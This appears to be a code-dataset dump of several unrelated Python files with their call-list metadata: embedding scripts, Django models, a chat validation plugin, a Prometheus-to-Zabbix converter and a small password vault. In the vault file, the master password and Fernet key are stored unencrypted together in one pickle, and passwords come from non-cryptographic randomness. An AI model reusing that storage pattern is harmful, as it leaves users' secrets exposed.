'serializers.IncepSyntaxCheckSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((69, 15, 69, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((82, 15, 82, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((112, 18, 112, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(112, 41, 112, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((127, 15, 127, 51), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((149, 15, 149, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((158, 15, 158, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((167, 15, 167, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((176, 15, 176, 69), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((183, 21, 183, 84), 'sqlorders.serializers.GenerateSqlOrdersTasksSerializer', 'serializers.GenerateSqlOrdersTasksSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((188, 15, 188, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((196, 15, 196, 43), 'libs.response.JsonResponseV1', 
'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((240, 18, 240, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(240, 41, 240, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((290, 18, 290, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(290, 41, 290, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((299, 21, 299, 79), 'sqlorders.serializers.ExecuteSingleTaskSerializer', 'serializers.ExecuteSingleTaskSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((304, 15, 304, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((311, 21, 311, 79), 'sqlorders.serializers.ExecuteMultiTasksSerializer', 'serializers.ExecuteMultiTasksSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((316, 15, 316, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((323, 21, 323, 74), 'sqlorders.serializers.ThrottleTaskSerializer', 'serializers.ThrottleTaskSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((328, 15, 328, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((341, 15, 341, 51), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((345, 26, 348, 81), 'libs.permissions.anyof', 'permissions.anyof', ({(345, 44, 345, 81): 'permissions.CanCommitOrdersPermission', (346, 44, 346, 79): 'permissions.CanViewOrdersPermission', (347, 44, 347, 82): 'permissions.CanExecuteOrdersPermission', (348, 44, 348, 80): 'permissions.CanAuditOrdersPermission'}, {}), '(permissions.CanCommitOrdersPermission, permissions.\n CanViewOrdersPermission, permissions.CanExecuteOrdersPermission,\n permissions.CanAuditOrdersPermission)', False, 'from libs import permissions\n'), ((352, 21, 352, 75), 'sqlorders.serializers.HookSqlOrdersSerializer', 'serializers.HookSqlOrdersSerializer', (), '', False, 'from sqlorders import models, serializers\n'), ((357, 15, 357, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((370, 14, 370, 67), 'sqlorders.models.DbExportFiles.objects.get', 'models.DbExportFiles.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((375, 19, 375, 70), 'django.http.HttpResponse', 'HttpResponse', (), '', False, 'from django.http import Http404, HttpResponse\n'), ((392, 15, 392, 44), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((417, 18, 417, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(417, 41, 417, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((432, 15, 432, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((447, 15, 447, 80), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((459, 15, 459, 53), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((470, 14, 470, 63), 'sqlorders.models.DbEnvironment.objects.values', 
'models.DbEnvironment.objects.values', ({(470, 50, 470, 54): '"""id"""', (470, 56, 470, 62): '"""name"""'}, {}), "('id', 'name')", False, 'from sqlorders import models, serializers\n'), ((479, 19, 479, 53), 'sqlorders.models.DbOrders.objects.raw', 'models.DbOrders.objects.raw', ({(479, 47, 479, 52): 'query'}, {}), '(query)', False, 'from sqlorders import models, serializers\n'), ((499, 18, 499, 56), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(499, 41, 499, 55): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((501, 15, 501, 40), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((40, 19, 40, 56), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((59, 22, 59, 60), 'libs.RenderColumns.render_dynamic_columns', 'render_dynamic_columns', ({(59, 45, 59, 59): 'render_columns'}, {}), '(render_columns)', False, 'from libs.RenderColumns import render_dynamic_columns\n'), ((68, 19, 68, 61), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((81, 19, 81, 57), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((136, 18, 136, 52), 'sqlorders.models.DbOrders.objects.get', 'models.DbOrders.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((148, 19, 148, 79), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((157, 19, 157, 79), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((166, 19, 166, 79), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((175, 19, 175, 79), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((187, 19, 187, 44), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((303, 19, 303, 81), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((315, 19, 315, 81), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((327, 19, 327, 50), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((356, 19, 356, 81), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((372, 18, 372, 60), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', (), '', False, 'from rest_framework.exceptions import PermissionDenied\n'), ((384, 26, 384, 40), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((384, 43, 384, 70), 'datetime.timedelta', 'datetime.timedelta', (), '', False, 'import datetime\n'), ((431, 19, 431, 57), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((446, 19, 446, 57), 'libs.response.JsonResponseV1', 'JsonResponseV1', (), '', False, 'from libs.response import JsonResponseV1\n'), ((468, 21, 468, 72), 'sqlorders.models.ReleaseVersions.objects.get', 'models.ReleaseVersions.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((223, 22, 223, 
132), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', (), '', False, 'from rest_framework.exceptions import PermissionDenied\n'), ((274, 22, 274, 132), 'rest_framework.exceptions.PermissionDenied', 'PermissionDenied', (), '', False, 'from rest_framework.exceptions import PermissionDenied\n'), ((365, 20, 365, 53), 'base64.b64decode', 'base64.b64decode', ({(365, 37, 365, 52): 'base64_filename'}, {}), '(base64_filename)', False, 'import base64\n'), ((441, 21, 441, 73), 'sqlorders.models.ReleaseVersions.objects.get', 'models.ReleaseVersions.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((195, 18, 195, 79), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', (), '', False, 'from sqlorders import models, serializers\n'), ((367, 15, 367, 71), 'sqlorders.models.DbExportFiles.objects.filter', 'models.DbExportFiles.objects.filter', (), '', False, 'from sqlorders import models, serializers\n'), ((371, 15, 371, 70), 'sqlorders.models.DbOrdersExecuteTasks.objects.get', 'models.DbOrdersExecuteTasks.objects.get', (), '', False, 'from sqlorders import models, serializers\n'), ((390, 59, 390, 73), 'django.utils.timezone.now', 'timezone.now', ({}, {}), '()', False, 'from django.utils import timezone\n'), ((220, 58, 220, 81), 'json.loads', 'json.loads', ({(220, 69, 220, 80): 'obj.auditor'}, {}), '(obj.auditor)', False, 'import json\n'), ((221, 58, 221, 82), 'json.loads', 'json.loads', ({(221, 69, 221, 81): 'obj.reviewer'}, {}), '(obj.reviewer)', False, 'import json\n'), ((271, 58, 271, 81), 'json.loads', 'json.loads', ({(271, 69, 271, 80): 'obj.auditor'}, {}), '(obj.auditor)', False, 'import json\n'), ((272, 58, 272, 82), 'json.loads', 'json.loads', ({(272, 69, 272, 81): 'obj.reviewer'}, {}), '(obj.reviewer)', False, 'import json\n'), ((385, 19, 387, 9), 'sqlorders.models.ReleaseVersions.objects.filter', 'models.ReleaseVersions.objects.filter', (), '', False, 'from sqlorders import models, serializers\n'), ((216, 15, 216, 74), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', (), '', False, 'from sqlorders import models, serializers\n'), ((267, 15, 267, 74), 'sqlorders.models.DbOrdersExecuteTasks.objects.filter', 'models.DbOrdersExecuteTasks.objects.filter', (), '', False, 'from sqlorders import models, serializers\n')] |
shmakn99/Knowledge-Graph-VG | perp_adj.py | ce2b0d6e16199357f1afc4aa7e58f74aae35e023 | import glove_util as gut
import numpy as np
from sklearn.decomposition import TruncatedSVD
import json
with open('freq_count_pred.json') as f:
freq_count_pred = json.load(f)
def get_pc(sentences):
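    # First principal component of the stacked sentence vectors, found with a rank-1 truncated SVD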
svd = TruncatedSVD(n_components=1, n_iter=7, random_state=0)
svd.fit(sentences)
return svd.components_
def weighted_avg(predicate,a,dim):
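    # Smooth-inverse-frequency weighted average of the GloVe vectors of the predicate's words:
    # each word vector is weighted by a / (a + frequency(word))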
predicate = predicate.lower().strip().split()
if len(predicate) == 1:
return gut.glove(predicate[0],dim)
else:
support = np.zeros(dim)
for word in predicate:
vector = gut.glove(word,dim)
if len(vector) == 0:
                vector = np.zeros(dim)  # fall back to a zero vector for out-of-vocabulary words (use dim, not a hard-coded size)
support += (a/(a+freq_count_pred[word]))*vector
return support
with open('relationships.json') as f:
relationships = json.load(f)
predicate_embedding = {}
sentences = []
i = 0
for image in relationships:
i+=1
if i%1000 == 0:
print (i)
for relation in image['relationships']:
w_avg = weighted_avg(relation['predicate'],0.001,300)
sentences.append(w_avg)
predicate_embedding[relation['relationship_id']] = w_avg
pc = get_pc(np.array(sentences))[0]
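# Projection matrix onto the first principal component; each embedding below has this common component removed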
projection_space = np.outer(pc,pc)
i = 0
for image in relationships:
i+=1
if i%1000 == 0:
print (i)
for relation in image['relationships']:
predicate_embedding[relation['relationship_id']] = predicate_embedding[relation['relationship_id']] - np.matmul(projection_space,predicate_embedding[relation['relationship_id']])
with open('predicate_embedding_300.json','w') as f:
json.dump(predicate_embedding,f)
| [((52, 19, 52, 34), 'numpy.outer', 'np.outer', ({(52, 28, 52, 30): 'pc', (52, 31, 52, 33): 'pc'}, {}), '(pc, pc)', True, 'import numpy as np\n'), ((7, 19, 7, 31), 'json.load', 'json.load', ({(7, 29, 7, 30): 'f'}, {}), '(f)', False, 'import json\n'), ((10, 7, 10, 61), 'sklearn.decomposition.TruncatedSVD', 'TruncatedSVD', (), '', False, 'from sklearn.decomposition import TruncatedSVD\n'), ((35, 17, 35, 29), 'json.load', 'json.load', ({(35, 27, 35, 28): 'f'}, {}), '(f)', False, 'import json\n'), ((65, 1, 65, 33), 'json.dump', 'json.dump', ({(65, 11, 65, 30): 'predicate_embedding', (65, 31, 65, 32): 'f'}, {}), '(predicate_embedding, f)', False, 'import json\n'), ((20, 9, 20, 36), 'glove_util.glove', 'gut.glove', ({(20, 19, 20, 31): 'predicate[0]', (20, 32, 20, 35): 'dim'}, {}), '(predicate[0], dim)', True, 'import glove_util as gut\n'), ((22, 12, 22, 25), 'numpy.zeros', 'np.zeros', ({(22, 21, 22, 24): 'dim'}, {}), '(dim)', True, 'import numpy as np\n'), ((51, 12, 51, 31), 'numpy.array', 'np.array', ({(51, 21, 51, 30): 'sentences'}, {}), '(sentences)', True, 'import numpy as np\n'), ((24, 12, 24, 31), 'glove_util.glove', 'gut.glove', ({(24, 22, 24, 26): 'word', (24, 27, 24, 30): 'dim'}, {}), '(word, dim)', True, 'import glove_util as gut\n'), ((61, 105, 61, 181), 'numpy.matmul', 'np.matmul', ({(61, 115, 61, 131): 'projection_space', (61, 132, 61, 180): "predicate_embedding[relation['relationship_id']]"}, {}), "(projection_space, predicate_embedding[relation['relationship_id']])", True, 'import numpy as np\n'), ((26, 13, 26, 26), 'numpy.zeros', 'np.zeros', ({(26, 22, 26, 25): '300'}, {}), '(300)', True, 'import numpy as np\n')] |
ElyTgy/VaultDB | crypt.py | 9eef6f7298d26bd9a18d403971e1c3c6e7a2bf8a | # Importing Fernet class
from cryptography.fernet import Fernet
# Importing dump and load function
from pickle import dump,load
# To generate a strong pw
def generate_pw():
from random import choice
choices = list("ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789!@#$%^&*()_-+=.,/<>?;:\\|[]}{")
pw = ""
for i in range(25):
pw += choice(choices)
    return pw
# To get master pw from the file
def get_masterpw():
# Opening the file storing master pw
with open("key.key",'rb') as file:
# Loading data
keys = load(file)
# Master pw is converted from bytes to string
key = keys[0].decode()
del keys
# Return keys
return key
# To get key from the file
def get_key():
# Opening the file storing master pw
with open("key.key",'rb') as file:
# Loading data
keys = load(file)
# Key is converted from bytes to string
key = keys[1].decode()
del keys
# Return keys
return key
# To store master pw in the file
def add_keys(masterpw,key):
# Opening the file to store master pw
with open("key.key",'wb') as file:
# Making list of value to upload
# key is already in bytes # Converting to bytes is not necessary
keys = [masterpw.encode(),key]
# Dumping the master pw to file
dump(keys,file)
# Deleting the variable
del masterpw,key,keys
# Checking if user is running program for first time
def is_1st_time():
# Trying to open bytes file
# If file is opened means program was executed once or more
try:
with open("key.key",'rb') as file:
pass
return False
# FileNotFound means its first time
# Or either its not in directory of this file or user deleted it :) #
except FileNotFoundError:
return True
# Function to copy pw to clipboard
def copy2clip(pw):
# Importing copy function
from pyperclip import copy
# Copying pw to clipboard
copy(pw)
del pw,copy
# Encrypting the text
def encrypt(text, key):
try:
# Defining Fernet(class) using the key
fernet = Fernet(key)
# Encryption # Text is converted to bytes
encrypted_text = fernet.encrypt(text.encode())
del key
# Return encrypted text
return encrypted_text
# Error message if any
except Exception as e:
print(f"Error occured:{e}\nProcess failed!")
# Decrypting the text
def decrypt(text, key):
try:
# Defining Fernet(class) using the key
fernet = Fernet(key)
# Decryption # Text is converted from bytes to string
decrypted_text = fernet.decrypt(text).decode()
del key
# Return decrypted text
return decrypted_text
# Error message if any
except Exception as e:
print(f"Error occured:{e}\nProcess failed!") | [((70, 4, 70, 12), 'pyperclip.copy', 'copy', ({(70, 9, 70, 11): 'pw'}, {}), '(pw)', False, 'from pyperclip import copy\n'), ((12, 14, 12, 29), 'random.choice', 'choice', ({(12, 21, 12, 28): 'choices'}, {}), '(choices)', False, 'from random import choice\n'), ((21, 15, 21, 25), 'pickle.load', 'load', ({(21, 20, 21, 24): 'file'}, {}), '(file)', False, 'from pickle import dump, load\n'), ((33, 15, 33, 25), 'pickle.load', 'load', ({(33, 20, 33, 24): 'file'}, {}), '(file)', False, 'from pickle import dump, load\n'), ((48, 8, 48, 23), 'pickle.dump', 'dump', ({(48, 13, 48, 17): 'keys', (48, 18, 48, 22): 'file'}, {}), '(keys, file)', False, 'from pickle import dump, load\n'), ((77, 17, 77, 28), 'cryptography.fernet.Fernet', 'Fernet', ({(77, 24, 77, 27): 'key'}, {}), '(key)', False, 'from cryptography.fernet import Fernet\n'), ((91, 17, 91, 28), 'cryptography.fernet.Fernet', 'Fernet', ({(91, 24, 91, 27): 'key'}, {}), '(key)', False, 'from cryptography.fernet import Fernet\n')] |
openeuler-mirror/oecp | oecp/executor/null.py | 967ed6b9e53f2da5f795f49bb5b5fc0423372863 | # -*- encoding=utf-8 -*-
"""
# **********************************************************************************
# Copyright (c) Huawei Technologies Co., Ltd. 2020-2020. All rights reserved.
# [oecp] is licensed under the Mulan PSL v1.
# You can use this software according to the terms and conditions of the Mulan PSL v1.
# You may obtain a copy of Mulan PSL v1 at:
# http://license.coscl.org.cn/MulanPSL
# THIS SOFTWARE IS PROVIDED ON AN "AS IS" BASIS, WITHOUT WARRANTIES OF ANY KIND, EITHER EXPRESS OR
# IMPLIED, INCLUDING BUT NOT LIMITED TO NON-INFRINGEMENT, MERCHANTABILITY OR FIT FOR A PARTICULAR
# PURPOSE.
# See the Mulan PSL v1 for more details.
# **********************************************************************************
"""
from oecp.executor.base import CompareExecutor
class NullExecutor(CompareExecutor):
def __init__(self, dump_a, dump_b, config=None):
super(NullExecutor, self).__init__(dump_a, dump_b, config)
if hasattr(dump_a, 'run') and hasattr(dump_b, 'run'):
dump_a.run()
dump_b.run()
def run(self):
return []
| [] |
Biswa5812/CaramelIT-Django-Backend | courses/models.py | 1f896cb75295d17345a862b99837f0bdf60868b4 | from django.db import models
from django.utils import timezone
# Course Category
class Course_category(models.Model):
category_id = models.AutoField(primary_key=True)
category_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
# Course Subcategory
class Course_subcategory(models.Model):
subcategory_id = models.AutoField(primary_key=True)
category = models.ForeignKey(Course_category, on_delete=models.CASCADE)
subcategory_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
# Course
class Course(models.Model):
course_id = models.AutoField(primary_key=True)
subcategory = models.ForeignKey(Course_subcategory, on_delete=models.CASCADE)
subcategory_name = models.CharField(max_length=100)
category_name = models.CharField(max_length=100)
course_name = models.CharField(max_length=100)
date_of_creation = models.DateTimeField(default=timezone.now)
course_description = models.TextField(default="")
course_difficulty = models.CharField(max_length=30)
# Course resources
class Course_resource(models.Model):
course = models.ForeignKey(Course, on_delete=models.CASCADE)
resourse_content = models.TextField(default="NIL")
resourse_name = models.CharField(max_length=100)
resourse_link = models.CharField(max_length=200)
resourse_length = models.CharField(max_length=10)
date_of_creation = models.DateTimeField(default=timezone.now)
| [((6, 18, 6, 52), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import models\n'), ((7, 20, 7, 52), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((8, 23, 8, 65), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((12, 21, 12, 55), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import models\n'), ((13, 15, 13, 75), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((14, 23, 14, 55), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((15, 23, 15, 65), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((19, 16, 19, 50), 'django.db.models.AutoField', 'models.AutoField', (), '', False, 'from django.db import models\n'), ((20, 18, 20, 81), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((21, 23, 21, 55), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((22, 20, 22, 52), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((23, 18, 23, 50), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((24, 23, 24, 65), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n'), ((25, 25, 25, 53), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((26, 24, 26, 55), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((30, 13, 30, 64), 'django.db.models.ForeignKey', 'models.ForeignKey', (), '', False, 'from django.db import models\n'), ((31, 23, 31, 54), 'django.db.models.TextField', 'models.TextField', (), '', False, 'from django.db import models\n'), ((32, 20, 32, 52), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((33, 20, 33, 52), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((34, 22, 34, 53), 'django.db.models.CharField', 'models.CharField', (), '', False, 'from django.db import models\n'), ((35, 23, 35, 65), 'django.db.models.DateTimeField', 'models.DateTimeField', (), '', False, 'from django.db import models\n')] |
thenetcircle/dino | dino/validation/events/message/limit_msg_length.py | 1047c3458e91a1b4189e9f48f1393b3a68a935b3 | # Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import traceback
from yapsy.IPlugin import IPlugin
from activitystreams.models.activity import Activity
from dino import utils
from dino.config import ErrorCodes
from dino.config import ConfigKeys
from dino.environ import GNEnvironment
logger = logging.getLogger(__name__)
__author__ = 'Oscar Eriksson <[email protected]>'
class OnMessageCheckContentLength(IPlugin):
def __init__(self):
super(OnMessageCheckContentLength, self).__init__()
self.env = None
self.enabled = False
self.max_length = 1000
def setup(self, env: GNEnvironment):
self.env = env
validation_config = self.env.config.get(ConfigKeys.VALIDATION)
if 'on_message' not in validation_config or 'limit_msg_length' not in validation_config.get('on_message'):
            logger.info('no config enabled for plugin limit_msg_length, ignoring plugin')
return
on_create_config = validation_config.get('on_message').get('limit_msg_length')
self.enabled = True
self.max_length = on_create_config.get(ConfigKeys.MAX_MSG_LENGTH, 1000)
def _process(self, data: dict, activity: Activity):
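        # Empty content is allowed; otherwise it must be valid base64 and, once decoded, no longer than max_length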
message = activity.object.content
if message is None or len(message.strip()) == 0:
return True, None, None
if not utils.is_base64(message):
return False, ErrorCodes.NOT_BASE64, \
'invalid message content, not base64 encoded'
message = utils.b64d(message)
if len(message) > self.max_length:
return False, ErrorCodes.MSG_TOO_LONG, \
'message content needs to be shorter than %s characters' % self.max_length
return True, None, None
def __call__(self, *args, **kwargs) -> (bool, str):
if not self.enabled:
return
data, activity = args[0], args[1]
try:
return self._process(data, activity)
except Exception as e:
            logger.error('could not execute plugin limit_msg_length: %s' % str(e))
            logger.exception(traceback.format_exc())
            return False, ErrorCodes.VALIDATION_ERROR, 'could not execute validation plugin limit_msg_length'
| [((23, 9, 23, 36), 'logging.getLogger', 'logging.getLogger', ({(23, 27, 23, 35): '__name__'}, {}), '(__name__)', False, 'import logging\n'), ((56, 18, 56, 37), 'dino.utils.b64d', 'utils.b64d', ({(56, 29, 56, 36): 'message'}, {}), '(message)', False, 'from dino import utils\n'), ((52, 15, 52, 39), 'dino.utils.is_base64', 'utils.is_base64', ({(52, 31, 52, 38): 'message'}, {}), '(message)', False, 'from dino import utils\n'), ((72, 29, 72, 51), 'traceback.format_exc', 'traceback.format_exc', ({}, {}), '()', False, 'import traceback\n')] |
tldr-devops/telegraf-monitoring-agent-setup | zabbix/prom2zabbix.py | 1f0b0f658acf9e685c121ffaee658bbe3fbad022 | #!/usr/bin/env python
# Script for parsing prometheus metrics format and send it into zabbix server
# MIT License
# https://github.com/Friz-zy/telegraf-monitoring-agent-setup
import re
import os
import sys
import time
import json
import socket
import optparse
try:
from urllib.request import urlopen
except ImportError:
from urllib import urlopen
METRICS = {
'default': {
'sort_labels': ['name', 'id', 'host', 'path', 'device', 'source', 'cpu'],
},
'docker_container_': {
'sort_labels': ['host', 'source', 'device', 'cpu'],
},
}
def parse(source='http://127.0.0.1:9273/metrics'):
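    # Fetch the metrics page and parse each exposition line into a dict with
    # metric name, labels, value, timestamp, the raw line and its HELP/TYPE context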
# https://prometheus.io/docs/practices/naming/
# https://prometheus.io/docs/concepts/data_model/#metric-names-and-labels
regex = re.compile(r'^(?P<metric>[a-zA-Z_:][a-zA-Z0-9_:]*)(?P<labels>{.*})?\s+(?P<value>.+)(\s+(?P<timestamp>\w+))?$')
help_line = ''
type_line = ''
metrics = []
text = urlopen(source).read()
for line in text.splitlines():
line = line.decode("utf-8")
if line[0:6] == '# HELP':
help_line = line
continue
elif line[0:6] == '# TYPE':
type_line = line
continue
elif line[0] == '#':
continue
metric = regex.match(line).groupdict()
metric['line_raw'] = line
metric['help'] = help_line
metric['type'] = type_line
metric['source'] = source
metrics.append(metric)
return metrics
def main():
parser = optparse.OptionParser()
source = 'http://127.0.0.1:9273/metrics'
destination = '/tmp/prom2zabbix'
parser.set_defaults(source=source,
destination=destination,
hostname='')
parser.add_option("-s", "--source", dest="source",
help="Prometheus source, default is " + source)
parser.add_option("-d", "--destination", dest="destination",
help="Output .keys and .metrics files pattern, default is " + destination)
(options, args) = parser.parse_args()
seconds = int(time.time())
metrics = parse(options.source)
data = {"data": []}
keys = {}
# fill and prepare metric
for metric in metrics:
if not metric['timestamp']:
metric['timestamp'] = seconds
if not metric['labels']:
metric['labels'] = '{}'
else:
            # limit the length of metric name + labels because of Zabbix limits
            # (even 132 characters is too long for a graph name)
if len(metric['metric']) + len(metric['labels']) > 200:
metric['original_labels'] = metric['labels'].replace(',', ';')
short_labels = []
for label in metric['labels'].lstrip('{').rstrip('}').split(','):
for key in METRICS.keys():
if key in metric['metric'] and key != 'default':
for l in METRICS[key]['sort_labels']:
if l in label:
short_labels.append(label)
break
metric['labels'] = '{' + ';'.join(short_labels) + '}'
else:
metric['labels'] = metric['labels'].replace(',', ';')
# hacks
if metric['metric'] == 'procstat_created_at':
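            # rewrite the exponent to scale the nanosecond-epoch value (~1e18) down to seconds (~1e9)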
metric['value'] = metric['value'].replace('e+18', 'e+09')
m = {}
for k, v in metric.items():
m["{#%s}" % k.upper()] = v
data["data"].append(m)
# addition for metric labels macro
if metric['metric'] not in keys:
keys[metric['metric']] = {"data": []}
keys[metric['metric']]["data"].append({
"{#LABELS}": metric['labels']})
# write metrics
with open(options.destination + '.metrics', 'w') as f:
for metric in metrics:
# https://www.zabbix.com/documentation/3.0/manpages/zabbix_sender
escaped_labels = metric['labels'].replace('\\', '\\\\').replace('"', '\\"')
f.write('- "telegraf[%s,%s]" %s %s\n' % (
metric['metric'],
escaped_labels,
metric['timestamp'],
metric['value']))
# write keys
with open(options.destination + '.keys', 'w') as f:
for metric in keys:
f.write('- "telegraf[keys, %s]" %s "%s"\n' % (
metric,
seconds,
json.dumps(keys[metric]
).replace('\\', '\\\\').replace('"', '\\"')))
data = json.dumps(data)
escaped_data = data.replace('\\', '\\\\').replace('"', '\\"')
f.write('- "telegraf[keys]" %s "%s"\n' % (
seconds,
escaped_data))
# print(data)
if __name__ == "__main__":
main()
| [((31, 12, 31, 122), 're.compile', 're.compile', ({(31, 23, 31, 121): '"""^(?P<metric>[a-zA-Z_:][a-zA-Z0-9_:]*)(?P<labels>{.*})?\\\\s+(?P<value>.+)(\\\\s+(?P<timestamp>\\\\w+))?$"""'}, {}), "(\n '^(?P<metric>[a-zA-Z_:][a-zA-Z0-9_:]*)(?P<labels>{.*})?\\\\s+(?P<value>.+)(\\\\s+(?P<timestamp>\\\\w+))?$'\n )", False, 'import re\n'), ((60, 13, 60, 36), 'optparse.OptionParser', 'optparse.OptionParser', ({}, {}), '()', False, 'import optparse\n'), ((72, 18, 72, 29), 'time.time', 'time.time', ({}, {}), '()', False, 'import time\n'), ((135, 15, 135, 31), 'json.dumps', 'json.dumps', ({(135, 26, 135, 30): 'data'}, {}), '(data)', False, 'import json\n'), ((36, 11, 36, 26), 'urllib.urlopen', 'urlopen', ({(36, 19, 36, 25): 'source'}, {}), '(source)', False, 'from urllib import urlopen\n'), ((133, 12, 134, 24), 'json.dumps', 'json.dumps', ({(133, 23, 133, 35): 'keys[metric]'}, {}), '(keys[metric])', False, 'import json\n')] |
gatech-sysml/CompOFA | NAS/run_NAS.py | baf561f14a561547ff51933e45f90ddf00cbb3cf | # CompOFA – Compound Once-For-All Networks for Faster Multi-Platform Deployment
# Under blind review at ICLR 2021: https://openreview.net/forum?id=IgIk8RRT-Z
#
# Implementation based on:
